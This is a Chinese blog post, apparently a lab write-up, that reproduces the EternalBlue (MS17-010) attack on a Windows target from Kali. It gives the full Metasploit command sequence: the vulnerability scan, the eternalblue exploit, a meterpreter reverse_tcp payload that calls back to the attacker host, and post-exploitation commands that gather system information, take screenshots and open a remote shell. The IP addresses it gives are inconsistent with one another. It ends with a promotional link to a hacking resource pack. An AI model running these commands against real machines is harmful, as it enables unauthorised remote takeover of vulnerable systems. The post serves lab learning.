记一次永恒之蓝漏洞复现

查看kali的IP地址:ifconfig

1695005157_6507b9e546e3ca4c1cbdf.png!small

查看靶机IP地址

1695005171_6507b9f3de0df98d4875a.png!small

测试两台主机的连通性:ping ip

1695005189_6507ba055c41c6c0ff9c4.png!small

查看kali数据库是否开启:service postgresql status

1695005196_6507ba0c83b7b1206aada.png!small

Active:inactive(dead)表示数据库是关闭的

打开kali数据库:service postgresql start

1695005205_6507ba157c37a26c23e2b.png!small

Active:active(exited)表示数据库是开启的

进行msfdb数据库初始化:msfdb init

启动msf:msfconsole

1695005232_6507ba306cc32c370bace.png!small

查看数据库连接情况:在msf命令提示符下:db_status

1695005243_6507ba3bf31054d455476.png!small

postgresql connected to msf 说明已经成功连接到了msf

搜索ms17_010:search ms17_010

1695005269_6507ba55cff74da744238.png!small

扫描命令:use auxiliary/scanner/smb/smb_ms17_010

攻击命令(后面使用):use exploit/windows/smb/ms17_010_eternalblue

此时如果不知道应该使用什么命令可以输入options获得帮助,其中关注两个命令:RHOSTS和THREADS

RHOSTS是要扫描的主机(主机段),THREADS是线段,默认是1,开始使用线程加快扫描

1695005281_6507ba61443da48b11316.png!small

设置扫描的主机或主机端(由于靶机IP地址是192.168.0.0,因此设置扫描主机段位192.168.0.0/24)

set rhosts 192.168.0.0/24,然后设置扫描线程为20;最后输入run执行扫描。同时可以打开wireshark进行抓包,监听eth0。扫描出来存在ms17_010漏洞的主机,也恰好是靶机。通过跟踪TCP流,得到了靶机的基本信息:操作系统、IP地址、协议。

1695005383_6507bac752d17f9e24b57.png!small

1695005393_6507bad1a1ee4efe61eb3.png!small

1695005398_6507bad6428384ea8ef8d.png!small

1695005416_6507bae802c5ce0437bec.png!small

进行攻击:use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标(靶机):set rhost 192.168.0.0

设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

设置监听主机(kali):set lhost 192.168.0.1

利用exploit进行攻击:exploit

1695005428_6507baf456cc84ee25ac3.png!small

1695005435_6507bafb6c50577409d65.png!small

可以看到监听(kali)IP(192.168.148.137)及端口(4444),被攻击主机(192.168.148.113)及端口(49159)之间建立了连接

显示远程主机系统信息:sysinfo

1695005497_6507bb391efc7529c0606.png!small

查看用户身份:getuid

1695005546_6507bb6a38b48a401a325.png!small

对当前远程主机屏幕进行截图:screenshot

1695005512_6507bb48e114cbdd55b5a.png!small

获得shell控制台:shell

1695005523_6507bb53bdae74f564179.png!small

朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序员一粟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值